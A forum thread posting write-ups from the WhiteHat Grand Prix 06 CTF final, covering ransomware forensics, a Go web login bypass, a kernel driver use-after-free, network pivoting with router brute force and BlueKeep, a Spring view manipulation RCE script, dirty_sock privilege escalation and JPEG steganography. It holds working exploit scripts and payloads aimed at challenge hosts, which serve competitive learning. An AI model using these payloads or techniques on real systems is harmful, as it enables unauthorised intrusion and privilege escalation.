Tổng hợp Write-up cuộc thi WhiteHat Grand Prix 06 - Vietnam Today - Vòng chung kết

Thảo luận trong 'Writeup WhiteHat Grand Prix' bắt đầu bởi WhiteHat News #ID:2018, 05/01/21, 02:01 PM.

  1. WhiteHat News #ID:2018

    WhiteHat News #ID:2018 WhiteHat Support

    Tham gia: 20/03/17, 10:03 AM
    Bài viết: 349
    Đã được thích: 119
    Điểm thành tích:
    43
    Chào các bạn, WhiteHat Grand Prix 06 – Vietnam Today vòng chung kết đã kết thúc. Cuộc tranh tài kéo dài 10 tiếng giữa 10 đội thi xuất sắc, trong đó 2 đội của Việt Nam, 3 đội đến từ Mỹ, 2 đội Hàn Quốc và 3 đội khác đến từ Nga, Ấn Độ và Đức.

    WHGP_finalround.png
    Ban tổ chức đăng writeup các challenge sau cuộc thi, qua đó giúp các đội thi và cộng đồng có thêm các kiến thức bổ ích.

    WhiteHat Grand Prix 06 - Vietnam Today gồm 8 challenge:

    Phần thi Jeopardy
    1. Forensic
    2. Web security
    3. Reverse engineering
    4. Pwnable
    5. Network (Miscellaneous)

    Phần thi IoT Jeopardy
    6. Web security
    7. Steganography
    8. Reverse + Nework (Camera)

    Xin cảm ơn các bạn!
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
    whf thích bài này.
  2. whf

    whf Super Moderator Thành viên BQT

    Tham gia: 06/07/13, 03:07 AM
    Bài viết: 1,134
    Đã được thích: 744
    Điểm thành tích:
    113
    Forensic01 | Team: More Smoked Leet Chicken

    By analyzing printable strings inside the given memory image we can spot some interesting ones:

    Those strings are related to an open-source ransomware called Pysome (https://github.com/Amansinghtech/Pysome). So now we should figure out the ciphertexts and the key used to encrypt the files.

    By looking around the found suspicious strings, we can also spot additional findings:

    First one is the encryption key, and the second one happens to be the ciphertext — there are multiple ones starting with gAAAAAB.

    By using the decryption tool found in the Pysome repository and giving it the key and ciphertexts, we decrypt nine PNG images with parts of the QR code, and assemble the complete QR from them.

    [​IMG]
    Flag:
    Mã:
    D0n't_p4y_4nyth1ng_F0r_Ransomwar3
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  3. whf

    whf Super Moderator Thành viên BQT

    Tham gia: 06/07/13, 03:07 AM
    Bài viết: 1,134
    Đã được thích: 744
    Điểm thành tích:
    113
    Web01 | Team: More Smoked Leet Chicken

    We’re given a link to a login form that says {"mess":"wrong sig"} to any login attempt.

    Step 1. In an HTML comment there is a pointer to guest/guest valid user combination and /source link that allows to download the web server binary that is serving the requests.

    Step 2. By analyzing the web server with IDA and IDAGolangHelper scripts, we can figure out that the web logic is pretty simple:

    ● the only function is the login that just looks up the user in the DB with provided login and password
    ● the signature is Hex SHA1 of login+password concatenated
    ● it uses Gin web framework and its JSON↔class-object-fields bindings
    ● it uses GORM to communicate with an SQLite database

    Step 3. Abuse the fact that Gin binds User object fields to the user-supplied JSON, and GORM looks up the user in the database using the same object fields. By providing an object without username or password, we can extract the first entry from the database, which happens to be admin. Signature should thus be set to SHA1 of an empty string:

    Mã:
    curl http://52.74.14.173:8082/login?sig=da39a3ee5e6b4b0d3255bfef95601890afd80709 -d '{}' 
    {"mess":"Adv3ntur3_1s_th3_b3st_w4y_t0_l34rn"} 
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  4. whf

    whf Super Moderator Thành viên BQT

    Tham gia: 06/07/13, 03:07 AM
    Bài viết: 1,134
    Đã được thích: 744
    Điểm thành tích:
    113
    Web01 | Team: KingTigerPrawn

    First of all, reversing the golang binary.
    We must send with sig data ( sha1(username + password) ) and if a user who is not a guest login successfully, can get FLAG !
    The problem is the server didn't check NULL parameters.
    This is our exploit code. Run and get FLAG.

    Mã:
    import requests
    import hashlib, json
    username = b''
    password = b''
    sig_hash = hashlib.sha1(username+password).hexdigest()
    url = "http://52.74.14.173:8082/login?sig=" + sig_hash
    print(url)
    data = {}
    ret = requests.post(url, data=json.dumps({}))
    print(ret.text)
    Mã:
    http://52.74.14.173:8082/login?sig=da39a3ee5e6b4b0d3255bfef95601890afd80709 
    {"mess":"Adv3ntur3_1s_th3_b3st_w4y_t0_l34rn"}
    Flag:

    Mã:
    WhiteHat{sha1(Adv3ntur3_1s_th3_b3st_w4y_t0_l34rn)}
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  5. whf

    whf Super Moderator Thành viên BQT

    Tham gia: 06/07/13, 03:07 AM
    Bài viết: 1,134
    Đã được thích: 744
    Điểm thành tích:
    113
    Reverse01 | Team: KingTigerPrawn

    Challenge gives striped x86 PE binary written by c++. After unpacking the binary using UPX, we can analyze the routine.

    The binary reads several numbers called `secret message`. It checks via mathematical equation: x+y+z=0, x^2+y^2+z^2=1, x^5+y^5+z^5=0.3402069.

    According to wolfram alpha, 0.3402069 is closed form with 5/6(sqrt(6)).

    upload_2021-1-6_14-36-9.png

    So we can ask wolfram alpha what was the solution for the equations.

    upload_2021-1-6_14-36-49.png

    And the binary compares the first input with “0123456789123456”. So the secret message is “0123456789123456,0.8164966,-0.4082483,-0.4082483”.

    Next, the binary also compares argv. argc should 8 and it checks argv[4], argv[5]. argv[5] checks using matrix multiplication. But I can’t decompile the function because it does not use for/while loop. So I parsed the coefficient matrix manually.

    upload_2021-1-6_14-52-42.png upload_2021-1-6_14-53-47.png upload_2021-1-6_14-54-39.png

    And just calculate the original vector.

    upload_2021-1-6_14-55-7.png

    argv[4] also checks via matrix multiplication, but it has more steps. It splits argv[4] to “|x|”. And do md5, base64, matrix multiplication. Especially, the last block does rc4 encryption.

    After parsing all the matrices and finding the original hash values from google, we can get the answer.

    argv[4]: thefirst|x|unbelievable|x|bigbang

    argv[5]: frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQF69AzBlax3CF3EDNhm3soLBPh71YexuieaoEiIgxIX4a2dREbbSqWy6yhKIDCdJOyapnxrpMCARCr4zdGc81tBDKsMlaZTXC1O8YFOGKjxRrJBdT3hVOfoaMeAjSWfchoZYFYZ5B6kzMCk8R6BEuZMrF6cI6NX8DYdD3ojxS

    upload_2021-1-6_15-0-54.png
    Flag:

    Mã:
    WhiteHat{sha1(FA2F6B41E96B52916BA4E25B34CA466B2DC9B4CB53A221B4E66A09353CC9C5EDC6566BC3DE4F87343FCDAA3BD2FADAA0&thefirst|x|unbelievable|x|bigbang&frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQF69AzBlax3CF3EDNhm3soLBPh71YexuieaoEiIgxIX4a2dREbbSqWy6yhKIDCdJOyapnxrpMCARCr4zdGc81tBDKsMlaZTXC1O8YFOGKjxRrJBdT3hVOfoaMeAjSWfchoZYFYZ5B6kzMCk8R6BEuZMrF6cI6NX8DYdD3ojxS)}
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  6. whf

    whf Super Moderator Thành viên BQT

    Tham gia: 06/07/13, 03:07 AM
    Bài viết: 1,134
    Đã được thích: 744
    Điểm thành tích:
    113
    Pwnable01 | Team: More Smoked Leet Chicken

    Description
    You can ssh into our server as a low-privilege user. Can you exploit our scull driver and read the flag?

    Summary
    This is a Linux kernel module pwn. The module source code is taken from the Linux Device Drivers book and made vulnerable by removing all synchronization. Time for userfaultfd!

    The challenge author was very nice and attached the module source code as well as the disk image, which has preconfigured network and sshd.

    TL;DR
    • Google some strings from the source code, e.g. SCULL_DEBUG. Or read the top comment, it mentions the book "Linux Device Drivers" directly.
    • Compare the source code with the original and notice that the synchronization is missing (funnily enough, the comments that mention it are still there).
    • Figure out data layout and terminology: quantum is a kmalloc chunk, qset is an array of pointers to quantums, scull device manages a list of qsets.
    • Overlap a quantum with a struct seq_operations to leak the address of single_start function.
    • Overlap a quantum with an array of pointers to quantums, overwrite the first pointer, use that for arbitrary reads and writes.
    • Pin the exploit to core #0.
    • Read *(void **)pcpu_base_addr, use that to read current_task of core #0, write init_cred to current_task->cred.
    • Spawn a shell and read the flag: WhiteHat{scU11_Scull_driv3r_h4h4_38842_s2}.
    Vulnerability
    The module manages 4 devices: /dev/scull[0-3], each of which simply stores data in the kernel memory and provides random access to it. The data is split into equally-sized chunks ("quantums") and laid out as in the following example:

    upload_2021-1-6_15-18-11.png
    Each device starts out empty. When data at a certain offset is accessed, the index of the containing struct scull_qset is computed as offset / (qset * quantum) and scull_follow is used to obtain a pointer to it, creating it and its predecessors if necessary. Then a quantum at index offset / quantum % qset is accessed using offset offset % quantum.

    The initial values of each device's quantum (size of quantums) and qset (number of quantums in each qset) are set from module parameters, however, those can be changed using ioctls on any scull device. This would not affect the existing devices though. In order to apply new settings to a device, one needs to open it with open(O_WRONLY). This will also delete all of its qsets and quantums.

    There is no synchronization, so if one thread does a read(), while another one is doing open(O_WRONLY), we have a use-after-free.

    Userfaultfd
    The race window is fairly small on both sides though, and it's not obvious how to extend it using the conventional means. userfaultfd is a mechanism that allows us to control very precisely when copy_from_user() or copy_to_user() return. This is achieved as follows:

    • mmap() a page. The kernel will not update the page table it right away, it will only create a corresponding VMA.
    • Create a userfaultfd object and tell it to keep an eye on this page.
    • Pass this page to read().
    • When the module calls copy_to_user(), a page fault will occur. A uffd_msg will be enqueued on the corresponding userfaultfd object. The thread will freeze and will not resume until this message is handled by the userspace.
    • Upon receiving this uffd_msg in another thread, userspace can instruct the kernel to handle the page fault by creating a page with specific data, thus unblocking the waiting thread.
    Leaking a kernel text pointer
    So far we can create a stable UAF by read() ing into a userfaultfd-backed page and doing open(O_WRONLY) after receiving uffd_msg. But how to make sure we read something useful from the freed memory?

    Kernel's allocator (SLUB in this case) groups chunks of the same size together - some relevant statistics can be found in /proc/slabinfo. Each free chunk of a particular size is put onto the corresponding freelist, which exhibits LIFO behavior. Therefore all we need to do is to convince the kernel to allocate an object of a size similar to that of the just freed one.

    There is a nice collection of kernel objects of different sizes that are particularly convenient for exploitation. I used seq_operations for this challenge.

    Arbitrary read/write
    By overlapping quantum of one device with qset pointer array of another one, we can put an arbitrary pointer into the latter. When performing a leak we could tolerate instability (e.g. what if another core randomly allocates an object with the desired size?) and just try again, but here we are writing, so such confusion would most likely lead to a crash. Therefore we need to aim for the least often used slab: kmalloc-8k. This corresponds to quantum size of 8192 and 1024 quantums per qset.

    Then, by using read() or write() on the second device we can read or write a value pointed to by the address we placed into the array. After that the device becomes almost unusable though (the pointer cannot be kfree() d) and has to be repaired. But since there are 4 of them, and we don't need more than 4 dereferences to complete the challenge, I skipped that step and just used a separate device for each one.

    Privilege escalation
    Normally we would strive for commit_creds(prepare_kernel_cred(NULL)), but getting PC control might be a hassle here. With arbitrary read/write, I used to do current->cred->uid = 0, but turns out there is an even easier way with one less dereference: current->cred = &init_cred.

    current is a per-CPU variable. When writing kernel modules in C, the way those are addressed is hidden behind macros, but here we have to implement it explicitly:

    upload_2021-1-6_15-19-44.png
    The offsets inside .data..percpu can be found in kallsyms:

    Mã:
    0000000000015C00 Acurrent_task
    
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  7. whf

    whf Super Moderator Thành viên BQT

    Tham gia: 06/07/13, 03:07 AM
    Bài viết: 1,134
    Đã được thích: 744
    Điểm thành tích:
    113
    Misc01 | Team: BTeam

    Description

    A vulnerable program is disclosed by an employee. Please find me. I hide in a organization's network.

    Summary

    • Externally exploit PWN service to take control of the device and then scan the network topology. Bruteforce to hijack the router. After gaining control of the router, exploit RDP vulnerability in WINDOWS 7 device and capture the flag.
    Network topology

    upload_2021-1-7_1-8-44.png
    Step 1: Exploit the pwn challenge provided by the Organiser
    • After penetrating the server, it is easy to see the secret file which reads the credentials to the device
    • upload_2021-1-7_1-9-38.png
    Step 2: Scan internal network range
    • After taking over the Ubuntu device, scan the network range.
    • Netdiscover/nmap will result in Router X (IP 10.0.255.51)
    • Bruteforce to get the router's account. After finding out the account “admin/271206", access the router and do the following commands: Show ip interface brief, Show ip route, Show arp, Show access-list, and so on.
    • Scan other devices in the same network range for Router Y and Router Z based on ICMP Reply and the information in the ARP table of Router X. Router Y and Router Z have the same account details as Router X with “admin/271206
    • Add route to access Y, Z
    Mã:
    Ip route add 10.0.0.0/16 via 10.0.255.51 dev eth0
    
    and run the same commands:* Show ip interface brief, Show ip route, Show arp, Show access-list, Show access-list, etc. *
    • You will see PC-Admin (192.168.205.7) from Router Z
    Step 3: RCE WIN 7 through RDP
    • From Router Z, perform NAT WIN 7 (PC-Admin (192.168.205.7) so that Ubuntu can be connected to WIN7
    Mã:
    Z#configure terminal
    Z(config)# ip nat inside source static 192.168.205.7 10.0.13.7
    Z(config)# interface e0/0
    ip nat outside
    Z(config)# interface e0/2
    ip nat inside
    • RDP ms2019-0708 vulnerability exists in the device.
    • On completing the exploitation, you will see the flag.txt file in windows/system32.
    • Flag:
      Mã:
      Cr4cK1nG_aNd_H4ck1nG_1s_L34rn1nG
    upload_2021-1-7_1-12-15.png
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  8. whf

    whf Super Moderator Thành viên BQT

    Tham gia: 06/07/13, 03:07 AM
    Bài viết: 1,134
    Đã được thích: 744
    Điểm thành tích:
    113
    IoT - Device | Team: KingTigerPrawn


    Part 1 - RCE

    we found vulnerability without “/source”.

    This vulnerability is Spring View Manipulation (https://github.com/veracode-research/spring-view-manipulation).

    Mã:
    import requests
    cookies = {
    'JSESSIONID': 'FB75916BB44FC011DD69A2385CB2BB9F',
    }
    headers = {
    'Connection': 'keep-alive',
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
    AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' }
    code = r"""
    import os
    os.system("cat /var/www/app/index.php")
    print(1)
    """
    cmd = 'python3 -c exec(bytes.fromhex(\'%s\').decode())' % (code.encode().hex()) params = (
    ('floor', '__${new
    String(T(Void).TYPE.forName("java.lang.Runtime").getMethods()[6].invoke(null).exe c("' + cmd + '").getInputStream().readAllBytes() )}__::o'),
    )
    response = requests.get('http://192.168.5.14:8976/device', headers=headers, params=params, cookies=cookies, verify=False)
    # print(response.text)
    print(response.status_code)
    print(response.text.split("[floors/", 1)[1].split("],")[0])
    Finally, we can access the shell with permission of homecenter.

    Part 2 - LPE

    Mã:
    $ env
    LC_ALL=en_US.UTF-8
    config=/root/secret
    LANG=en_US.UTF-8
    HOSTNAME=4b8ac6f2aad2
    ...
    
    We found a secret in the root directory.

    so we tried LPE and found dirty_sock version1(CVE-2019-7304)

    Mã:
    [email protected]:~/secret# cat credentials.txt
    Vi3t_N4m_c4n_pr0duc3_C0V1D19_v4ccin3
    
    Flag:
    Mã:
    WhiteHat{sha1(Vi3t_N4m_c4n_pr0duc3_C0V1D19_v4ccin3)}
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  9. whf

    whf Super Moderator Thành viên BQT

    Tham gia: 06/07/13, 03:07 AM
    Bài viết: 1,134
    Đã được thích: 744
    Điểm thành tích:
    113
    Steg | Team: BTeam


    We have the JPEG image WhiteHat_BMS.jpg and we know that there is something inside it.

    [​IMG]
    The image is in JPEG format, so it’s unlikely for data hiding in LSB of color channels. Moreover, run strings on this image shows no result.

    There are two hints for this challenge, the first one is “Take a look at the frequency domain” and the later one is “DCT AC coefficients for each 8x8 block”. This suggests that the hidden information should be in the AC coefficients of the image. JPEG format transfers the original spatial domain to frequency domain by applying Discrete Cosine Transform (DCT), and then applies quantization to reduce the size of binary data write to file. The quantized coefficients are directly written to file, so data can be embedded into that space without worrying of data loss, similarly to embedding data to LSB of PNG image.

    [​IMG]

    Use a tool such as JPEGsnoop to read the quantized DCT coefficients of this JPEG image. Look at quantized AC coefficients of luminance:

    [​IMG]

    For each 8x8 block, note that only quantized value of either 1 (-1) or 2 (-2) appears in that block (the red dots in the above figure). This suggests that each block contains one bit value, the block with absolute value of 1 is bit 0 and block with absolute value of 2 is bit 1 (other blocks are ignored). Write a script to extract bit value from each block automatically to achieve the flag :D

    [​IMG]
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
    Sugi_b3o thích bài này.